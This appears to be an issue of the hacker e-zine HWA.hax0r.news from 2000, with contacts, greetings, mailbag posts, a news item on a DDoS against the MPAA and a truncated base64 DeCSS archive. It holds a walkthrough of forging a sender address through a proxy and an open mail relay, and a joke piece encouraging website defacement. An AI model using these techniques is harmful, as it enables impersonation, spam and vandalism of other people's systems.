ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL
I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email
cruciphux@dok.org
THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS
ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT
AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:
I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND
REDISTRIBUTE/MIRROR. - EoD
** USE NO HOOKS **
Although this file and all future issues are now copyright, some of the
content holds its own copyright and these are printed and respected. News
is news so i'll print any and all news but will quote sources when the
source is known, if its good enough for CNN its good enough for me. And
i'm doing it for free on my own time so pfffft. :)
No monies are made or sought through the distribution of this material.
If you have a problem or concern email me and we'll discuss it.
HWA (Hackers Without Attitudes) is not affiliated with HWA (Hewlitts
Warez Archive?), and does not condone 'warez' in any shape manner or
form, unless they're good, fresh 0-day and on a fast site. <sic>
HWA.hax0r.news is now officially sponsored by the following entities:
HWA Internet Security
http://hwa-security.net/
CubeSoft Communications
http://www.csoft.net/
We strongly suggest Csoft for your hosting needs, tell them cruciphux
from HWA sent you. contact julien@csoft,net for details and check the
site for plans available.
Rights of sources included in our newsletter/zine
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Some sources and agencies impose unfair limitations and restrictions on
the use of their data, I do not generally ask permission to include the
articles from major media or other persons that have published material
on the net, imho this material is public domain.
Example:
"This material is subject to copyright and any unauthorised use, copying or
mirroring is prohibited. "
This notice will be disregarded we don't charge for access to these archives,
if anything we're doing the site(s) a favour by disseminating their news.
Legal action will result in a civil disobedience action and will incur
underground continuance of our zine.
cruciphux@dok.org
Cruciphux [C*:.] HWA/DoK Since 1989
00.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
____ _ _
/ ___|___ _ __ | |_ __ _ ___| |_ ___
| | / _ \| '_ \| __/ _` |/ __| __/ __|
| |__| (_) | | | | || (_| | (__| |_\__ \
\____\___/|_| |_|\__\__,_|\___|\__|___/
Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
Canada / North America (hell even if you are inside ..) and wish to
send printed matter like newspaper clippings a subscription to your
cool foreign hacking zine or photos, small non-explosive packages
or sensitive information etc etc well, now you can. (w00t) please
no more inflatable sheep or plastic dog droppings, or fake vomit
thanks.
Send all goodies to:
HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5
WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you
~~~~~~~ are reading this from some interesting places, make my day and
get a mention in the zine, send in a postcard, I realize that
some places it is cost prohibitive but if you have the time and
money be a cool dude / gal and send a poor guy a postcard
preferably one that has some scenery from your place of
residence for my collection, I collect stamps too so you kill
two birds with one stone by being cool and mailing in a postcard,
return address not necessary, just a "hey guys being cool in
Bahrain, take it easy" will do ... ;-) thanx.
Ideas for interesting 'stuff' to send in apart from news:
- Photo copies of old system manual front pages (optionally signed by you)
- Photos of yourself, your mom, sister, dog and or cat in a NON
compromising position plz I don't want pr0n. <g>
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
tapes with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone
fun or social engineering examples or transcripts thereof.
Stuff you can email:
- Prank phone calls in .ram or .mp* format
- Fone tones and security announcements from PBX's etc
- fun shit you sampled off yer scanner
- reserved for one smiley face -> :-) <-
- PHACV lists of files that you have or phac cd's you own (we have a burner)
- burns of phac cds (email first to make sure we don't already have em)
- Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc
If you still can't think of anything you're probably not that interesting
a person after all so don't worry about it <BeG>
Our current email:
Submissions/zine gossip.....: cruciphux@dok.org
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas2@usa.net
Other methods:
Cruciphux's ICQ:58939315 note; not always online, and do not abuse or use
for lame questions!
My Preffered chat method: IRC Efnet in #HWA.hax0r.news
@HWA
00.2 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~
__ ___ ___
\ \ / / |__ ___ __ _ _ __ _____ ____|__ \
\ \ /\ / /| '_ \ / _ \ / _` | '__/ _ \ \ /\ / / _ \/ /
\ V V / | | | | (_) | (_| | | | __/\ V V / __/_|
\_/\_/ |_| |_|\___/ \__,_|_| \___| \_/\_/ \___(_)
Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/programming/IRC+ man in black
sas2@usa.net .............. currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black
twisted-pair@gmx.net......: currently active/programming/IRC+
pyra......................: currently active/crypto queen
Foreign Correspondants/affiliate members (Active)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Qubik ............................: United Kingdom
D----Y ...........................: USA/world media
Zym0t1c ..........................: Dutch/Germany/Europe
Sla5h.............................: Croatia
Spikeman .........................: World Media/IRC channel enforcer
Armour (armour@bur.st)............: Australia
Wyze1.............................: South Africa
Xistence..........................: German/Dutch translations
Past Foreign Correspondants (currently inactive or presumed dead)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
N0Portz ..........................: Australia
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck ........................: Netherlands/Holland
Please send in your sites for inclusion here if you haven't already
also if you want your emails listed send me a note ... - Ed
Spikeman's site is down as of this writing, if it comes back online it will be
posted here.
http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)
Sla5h's email: smuddo@yahoo.com
*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*******************************************************************
:-p
1. We do NOT work for the government in any shape or form.Unless you count
paying taxes ... in which case we work for the gov't in a BIG WAY. :-/
2. MOSTLY Unchanged since issue #1, although issues are a digest of recent
news events its a good idea to check out issue #1 at least and possibly
also the Xmas 99 issue for a good feel of what we're all about otherwise
enjoy - Ed ...
@HWA
01.0 Greets!?!?! yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
____ _
/ ___|_ __ ___ ___| |_ ___
| | _| '__/ _ \/ _ \ __/ __|
| |_| | | | __/ __/ |_\__ \
\____|_| \___|\___|\__|___/
Thanks to all in the community for their support and interest but i'd
like to see more reader input, help me out here, whats good, what sucks
etc, not that I guarantee i'll take any notice mind you, but send in
your thoughts anyway.
New members/affiliates
Xistence ..... General news and Dutch/German translations
sP|a|Zm ..... Swedish news / translations
SugarKing ..... General news articles
* all the people who sent in cool emails and support
GREETS
~~~~~~
FProphet Pyra TwstdPair _NeM_
D----Y Dicentra vexxation sAs*
Spikeman p0lix Vortexia Wyze1
Pneuma Raven Zym0t1c duro
Repluzer astral BHZ ScrewUp
Qubik gov-boi _Jeezus_ Haze_
theduece ytcracker loophole BlkOps
MostHated vetesgirl Slash bob-
CHEVY* Debris pr1zm JimJones
Dragos Ruiu pr0xy MR^CHAOS senn
Fuqrag Messiah v00d00 meliksah
dinkee omnihil sP|a|Zm OE
KillNow iPulse erikR prizm
paluka Xistence doobee phold hi ;)
{} mixter merXor abattis
ashie diesl0w aus Julien/Csoft
b0f chappies DoK chappies and our HWA clan
DISSES?
~~~~~~~
You get the biggest dis of them all, your name(s) will not
even be mentioned here in the zine, you are nothing. You
know who you are, deal and squeal.
EoF
shouts to Xochitl13 for sending the cool postcard with a pic
of the la 2600 meeting place. cheers dude! btw your mailbox
is full ...
Folks from #hwa.hax0r,news and other leet secret channels,
*grin* - mad props! ... ;-)
And many others, sorry if i missed you or forgot you! mail
me and i'll flail myself unforgivingly in front of my open
bedroom window until I bleed, then maybe, add u to the list
(please, don't ask for pics...)
Also mad props to doobee and the CCC (Chaos Computer Club)
in Germany for setting up a new listserv system to help
distribute the zine. (Will be in action soon, I have admin
work to do first and testruns..).
:-)))
Ken Williams/tattooman ex-of PacketStorm,
SpaceRogue for running a kick ass news net
Emmanuel Goldstein for pure staying power
All the crackers, hackers and phreakers
The sysadmins, NOC controllers, network engineers
IRCops, security professionals, tiger team operatives
military cyberwar grunts, feds and 'special computer
unit' coppers trying to keep shit together in this
anarchic chaos.
AND
Kevin Mitnick (free at last, stay free this time man...)
Kevin was released from federal prison on January 21st 2000
for more information on his story visit http://www.freekevin.com/
not familiar with his story? you should be, it affects us all
especially if you're in the U.S
-=-
kewl sites: Updated May/Jun 2000
Placement on list has no bearing of how "kewl" the sites are. :-p
+ http://hackdesk.dhs.org/
+ http://www.hack.co.za/ ** may be up, may be down... **
+ http://blacksun.box.sk/
+ http://packetstorm.securify.com/
+ http://www.securityportal.com/
+ http://www.securityfocus.com/
+ http://www.hackcanada.com/
+ http://www.freekevin.com/
+ http://www.genocide2600.com/
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
+ http://www.403-security.org/
+ http://www.pure-security.net/
+ http://ech0.cjb.net/
+ http://www.r00tabega.com/
+ http://eeye.com/
+ http://ussrback.com/
+ http://el8.org/
+ http://adm.freelsd.net/
+ http://www.l0pht.com/
+ http://www.2600.com/
@HWA
01.1 Last minute stuff, rumours and newsbytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
_ _ ____ _
| \ | | _____ _____| __ ) _ _| |_ ___ ___
| \| |/ _ \ \ /\ / / __| _ \| | | | __/ _ Y __|
| |\ | __/\ V V /\__ \ |_) | |_| | || __|__ \
|_| \_|\___| \_/\_/ |___/____/ \__, |\__\___|___/
|___/
"What is popular isn't always right, and what is right isn't
always popular..."
- FProphet '99
Since we provide only the links in this section, be prepared
for 404's - Ed
+++ When was the last time you backed up your important data?
++ www.hack.co.za is back online (see elsewhere for story on gov-boi
and a tassle with phonic) (June 2000)
#darknet is current 'official' hack.co.za public IRC channel
it is generally open on EFnet, but sometimes closed due to
attacks from lamers with nothing better to do than disrupt IRC,
Thanks to myself for providing the info from my wired news feed and
others from whatever sources, Zym0t1c and also to Spikeman for sending
in past entries.... - Ed
@HWA
01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*** NEW WEB BOARD! ***
========================================================================
The message board has been REVIVED with a new script and is doing quite
well. Check it out
http://discserver.snap.com/Indices/103991.html
.
Don't be shy with your email, we do get mail, just not much of it
directed to other readers/the general readership. I'd really like to
see a 'readers mail' section. Send in questions on security, hacking
IDS, general tech questions or observations etc, hell we've even
printed poetry in the past when we thought it was good enough to
share.. - Ed
=======================================================================
* From the Web board: *
~~~~~~~~~~~~~~~~~~~~~~~~
(Didn't pull much from the board, check it out, some interesting
stuff on there... - Ed)
rst-: drskru@gmx.net
New Group SKRU for YOU!
Sun May 21 17:27:36 2000
New group now recruiting!
Fun hax0r group :)) must have a sense of humour
will skewl.
http://skru2k.tripod.com/skru/
EFnet
#Script-Kids-R-Us
:-)
See ya there, keep up the cool zine! bye....
-=-
note: this group has defaced several sites and mirrors can be seen
on Attrition.org, also channel is keyed. - Ed
-=-
A little late unfortunately but for your ref; - Ed
Lucian: lucjam@mindspring.com
TV film on script kiddies
Wed May 17 15:26:27 2000
Hi HWA,
Am working on a big new film about kid hackers / crackers / script kiddies
for British TV. Treating them not as anti-corporate heroes, or geniuses,
but as willful, cat burgling pranksters.
I need to find some contacts for hackers (and their admirers!) before the
end of this week...
This isn't some lame documentary exposing people, this is a cool story,
not a news expose, happy for anyone to be anonymous,
Am on to all the usual suspects, but any new stories leads would be really
appreciated.
thanks
Lucian
-=-
Unfortunately I didn't respond to this fella, I wonder who the 'usual
suspects' were ... hrm - Ed
-=-
SugarKing: sugarking2001@hotmail.com
2600 going too far?
Mon May 8 11:04:30 2000
2600 registers verizonREALLYsucks.com going after Verizon Wireless.
And before this fucknbc.com ? What are they trying to prove? Anyone
have anything to say about this? I'm thinking of writing and article
about it...give me some feedback.
SugarKing
-=-
allnet33
2600 going to far
Tue Jun 6 22:23:45 2000
I think 2600 is trying to challenge corporate america
every chance they get. They want to cause political
trouble just to keep things stirred up so that they
have something to write about.
-=-
Check board for other threads. Open up a convo...
@HWA
02.0 Words from the editor.
~~~~~~~~~~~~~~~~~~~~~
_____ _ _ _ _
| ____|__| (_) |_ ___ _ __( )__
| _| / _` | | __/ _ \| '__|/ __|
| |__| (_| | | || (_) | | \__ \
___|_____\__,_|_|\__\___/|_| |___/
/ ___| ___ __ _ _ __ | |__ _____ __
\___ \ / _ \ / _` | '_ \| '_ \ / _ \ \/ /
___) | (_) | (_| | |_) | |_) | (_) > <
|____/ \___/ \__,_| .__/|_.__/ \___/_/\_\
|_|
#include <stdio.h>
#include <thoughts.h>
#include <backup.h>
main()
{
printf ("Read commented source!\n\n");
/* Its mostly been said in the two listbot mailing list news
* announcement msgs, however i'd like to point out that some
* items may fall outside the stated coverage period due to
* threading, these were left for clarity.
*
* I'd like to thank staff members and especially Pyra and
* Merxor, SugarKing, TP for their great help in getting this
* issue and #54 into shape, thanks guys!
*
* Also thanks to {}, JimJones, Slash and Prizm for other
* help and direction. *wink wink*
*
* Cruci-
*
* cruciphux@dok.org
* Preffered chat method: IRC Efnet in #HWA.hax0r.news
*
*/
printf ("EoF.\n");
}
Snailmail:
HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5
Anonymous email:
telnet (wingate ip) (see our proxies list)
Wingate>0.0.0.0
Trying 0.0.0.0...
Connected to target.host.edu
Escape character is '^]'.
220 target.host.edu ESMTP Sendmail 8.9.3/8.9.3; Sun, 6 Feb 2000 17:21:00 -0500 (EST)
HELO bogus.com
250 target.host.edu Hello ~ereet@target.host.edu [ 0.0.0.0 ], pleased to meet you
MAIL FROM: admin@nasa.gov
250 admin@nasa.gov... Sender ok
RCPT TO: cruciphux@dok.org
250 cruciphux@dok.org... Recipient ok
DATA
Secret cool infoz
.
QUIT
If you got that far everything is probably ok, otherwise you might see
550 cruciphux@dok.org... Relaying denied
or
550 admin@nasa.gov... Domain must exist
etc.
* This won't work on a server with up to date rule sets denying relaying and your
attempts will be logged so we don't suggest you actually use this method to
reach us, its probably also illegal (theft of service) so, don't do it. ;-)
-=-
Recent public posts to listbot mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Jun 13 2000 21:25:48 EDT
From: HWA.hax0r.news <HWA.hax0r.news-owner@listbot.com>
Subject: NEWS: HWA.hax0r.news is ALIVE!
Hi folks;
My apologies for the delay this time around, personal problems
and other work commitments have kept me from my hobby. This is
being remedied and things should pick up from here on in as we
get organized.
Here is some news for you.
HWA-security.net has been registered and will be hosted by our
good friends at Csoft (cheers Julien), check www.csoft.net for
your hosting/vhost needs. They know their shiat. Site us under
development and will be online soon.
Once again we're looking for new staff members or volunteers
to act as reporters, interviewers, news gatherers, file finders
etc. More details in release #53 which will be released this weekend
June 18th.
---> Email me at cruciphux@dok.org
** Issue #53 will be released June 18th and will cover material and
submissions from April 9th thru May 7th 2000.
** Issue #54 MAY be out this weekend also but I doubt it..we'll see
how busy things get around here, #54 will contain the recent news
and cover May 7th to present (release date). I will try my best to
get #53 and #54 out close to each others release dates, i'm doing it
this way to maintain coverage period per issue number.
<contd next message>
From: HWA.hax0r.news <HWA.hax0r.news-owner@listbot.com>
Subject: NEWS part 2: HWA.hax0r.news
HWA.hax0r.news - http://welcome.to/HWA.hax0r.news/
Hi again,
<cont'd part 2 of 2>
We appreciate your staying with us and giving us support, although
I'm largely doing this for selfish reasons and fun it is nice to
hear others getting off on it too, I've decided to expand operations
and offer more to the community.
I've decided to become more organized and have taken on a staff to
help with the production of the zine with an eye to keeping a more
timely release date and more reliable/quality production. If you
can help send me an email with a mini resume listing your talents
and areas you would be interested helping in.
** This is a non-profit venture. Sponsored by CUBESOFT. **
Yes we're doing it all for fun, like the old days :)
Many areas are open for you to offer help, think of this as a
fresh startup, what is it? a cross between Securityfocus, HNN
PacketStorm and the like. Sponsors are welcome, your donations
or ads will be redirected into the development of this project.
HWA-Security.net - Web site development, design, CGI, forums
programming, administration, forum admin, mailing list admin
PHP programming, java to proofreading and data collection.
Email me at cruciphux@dok.org with what you think you can do to
help or are interested in becoming a sponsor for this worthwhile
cause.
Mailing Address:
HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5
SPONSORS, Commercial Advertising, Conference.
=============================================
Contact me for product advertising, or sponsorship details/offers
and we can work something out. I don't gouge and am looking to
work towards financing a new Canadian Con. CanCon 99 failed due
to lack of sponsorship/expertise in 1999, if you can help or offer
sponsorship, I want to hear from you.
Cruciphux@dok.org
Talk to us live
===============
Drop off news or just hang and idle or chat, don't forget to join us
on EFNet IRC #HWA.hax0r.news, if channel has a key then ..
/join #hwa.hax0r.news zwen
(key is zwen and if that does not work msg cruciphux i'm usually
online most days.)
Qualifications?
===============
I don't claim to know it all or be a mad skewled expert but am a 35 yr old
"old school" ex-hacker, currently certified Unix Admin, Linux Admin and
Internet Security Specialist... information doesn't necessarily want to be
$7.15
<no offence to Emmanuel/Eric>
Cheers
Cruciphux, (Steve Carpenter)
HWA Editor/Founder, DoK, b0f
b0f security
http://b0f.freebsd.lublin.pl/
=-=
Congrats, thanks, articles, news submissions and kudos to us at the
main address: cruciphux@dok.org complaints and all nastygrams and
mailbombs can go to /dev/nul nukes, synfloods, trinoo and tribe
or ol' papasmurfs to 127.0.0.1,
private mail to cruciphux@dok.org
danke.
C*:.
-= start =--= start =--= start =--= start =--= start =--= start =--= start
____ _ _
/ ___|___ _ __ | |_ ___ _ __ | |_
| | / _ \| '_ \| __/ _ \ '_ \| __|
| |__| (_) | | | | || __/ | | | |_
\____\___/|_| |_|\__\___|_| |_|\__|
/ ___|| |_ __ _ _ __| |_
\___ \| __/ _` | '__| __|
___) | || (_| | | | |_
|____/ \__\__,_|_| \__|
-= start =--= start =--= start =--= start =--= start =--= start =--=
03.0 Hacking your way into a girlie's heart, etc by: ch1ckie
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
04/09/00
///////////////////////////////////////////
GGGGGG OOOOOOO AAAAAAAA TTTTTTTTTT
G O O A A TT
G GGG O O AAAAAAAA TT
G G O O A A TT
GGGGGG OOOOOOO A A TT
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
[g0at] http://www.goat-advisory.org [g0at]
-=g0at media productions=-
((Hacking your way into a girlie's heart, etc))-((by: ch1ckie))
->Lesson One: Making Yourself Appear More Elite Than You Actually Are.
-In real life, or on IRC, the most important thing that a girlie looks for in a hax0r is
skill (she hopes it will move her up in the world), whether it is real skill (which is
hard to come by these days) or if its simply an elite host (hax0r@fbi.gov).
-To make yourself appear more elite than you actually are (or ever will be), the first
step is getting yourself an elite host (2845818@shellyeah.org probably won't cut it),
either by means of a shell, wingate, or bnc (and if you don't know of these things, just
tell the girl you admin some big network in your spare time and i'm sure she'll be
impressed).
-In all retrospect, most girlies don't know the difference between _you_ and the real
thing, so don't worry.
-Opposing popular use...to the majority of girlies, it is best not to use leet speak
(eye 4m 4 m45t0r hax0r); this will more often than not end up confusing them and leave
them bewildered. Thus, trying to impress them will prove useless. If you happen to have
a girl that knows 'leet speak', don't directly use this speak with her either, but use
it when she is in the premisis ("y0 m4ng, u b3tt4 ch3ck y0s3lf b4 u wr3ck y0s3lf"). This
will undoubtfully make you appear more elite/phearful than you actually are.
-For those of you who are more 'skilled', deface webpages in the fair name of your
girlie... ("U R 0wned; mad props to my girlie"). This is a concept far beyond most
girlies, and seeing their name on www.yahoo.com proves very impressive.
A few other methods of making yourself appear elite:
-obtaining operator status in as many channels as possible, do whatever you can to do so...
suck dick, kiss ass, or stomp on some heads.
-pinging out her enemies on command will impress/delight her enough to have even cyber sex with
you... might wanna keep that in mind.
-using random 'big' words such as "heuristic control algorithm" or "pleisiochronous
communications" will be sure to impress... they do not even have to be in an order that makes
any sense. As long as your girlie hears 'big important words', she will believe that you are
elite...and the sad part is, that you will probably believe that you are too :(.
*Making yourself appear more elite than you actually are, is the first step to hacking your way
into a girlie's heart. Lesson two and three coming soon ('Making Your Girlie Feel Important',
and 'Understanding Your Girlie').*
[Shouts to my 'elite' gang in ftg ....Debris, nerp, potus, omega44, JimJones, and all the rest.]
"If only i could be as cool as you." - Silverchair
ch1ckie@ EFNet
ch1ckie.cjb.net
ch1ckie@hotmail.com
@HWA
04.0 [HWA] MPAA Site DoS'd off the net
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 12th 2000
By: Cruciphux
Source: Anonymous (one of the persons involved contacted us directly on IRC)
Data: confirmed
http://www.mpaa.org has been down for nine hours or so as I write this
several T1's were employed in a distributed DoS attack against the site
further information will be posted as I get it.
It is also rumoured that many sites affiliated with MPAA such as Tristar
will also be going down over the next week.
Some recent anti-MPAA defacements follow, the first site includes the
full UUencoded source code to DeCSS, (This site was censored by
Attrition for fear or reprimand from the MPAA I believe this is a
first for Attrition in censoring defaced pages. - Ed)
http://www.safemode.org/mirror/2000/04/11/courtavenue_com/
<Screwloose Logo>
... fuck censorship! a focus on MPAA(sic).
You know one thing I am really brassed off about, and it has been going on since
so-called "civilisation" existed. Is how censorship is controling our lives. Governments
control people by the millions through forced relegions, cults, and conspiracies while
ripping us off in the process. Enterprises and Government work hand in hand to
exploit the common people. Enterprises use Governmnet as a tool to uphold
censorship and inevitably generate revenue for them, and likewise for the government
as they reap the taxes in return(that's why the US government won't take their finger
out of their ass, and split up Microsoft and other overbloated monopolies which are
very unethical with their business stratigies). Hmm, I know what your thinking "Isn't
the idea of a 'democratic' government suppose to let the common people control their
government, not the other way around?!?", yeah an your compleately right ....
fascism is still commonplace even today in 1st world countries.
Which brings me to the attention of MPAA(Motion Picture Association of America)
who are trying to control how we watch DVD's, where we watch them, who we watch
them with(does this include pets such as dust mites?!?), and what parts we watch. For
example "Are we allowed to skip their brainwashing advertisments and other shit for
which they want to control us with?". I feel paranoid when I have a friend watching a
DVD with me just incase I am breaking the law. LOL! :/. Where does censorship end?!
It's all DEEPLY psycological you know! MPAA have restrained the right for people to
write drivers for no computer operating system other than Microsoft's very own
"Windows" range, this means that you have to loose your precious uptimes of months
on your unix systems for a few hours of entertainment(hardly seems worth it).
"...and remember all visionaries are fascist bastards!" - ScrewLoose
Shouts go to...
BlazinWeed, phov0s/datawar, and other nigguhs who inspired me.
Here is the DeCSS code
This version of the code is for M$ Windows and is in the form of a ".dll"(dynamic link
library). It can decrypt any information stored on every DVD CD, yes it's the code that
MPAA don't want anyone just to pass it on OR EVEN LINK TO IT!!?!? I am deadly
serious. It makes you think "What are those mother fuckers got to hide?". You could
probably find a uu base64 decoder at davecentral for both Windows and Linux(if your
distribution doesn't come with a version already). See for yourself... . .
N.B.It is advised to rip this code straight from the HTML source to ensure
that it is decoded 100% properly.
------------ CUT HERE (filename = "decss.zip") ------------- begin-base64
644 2 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
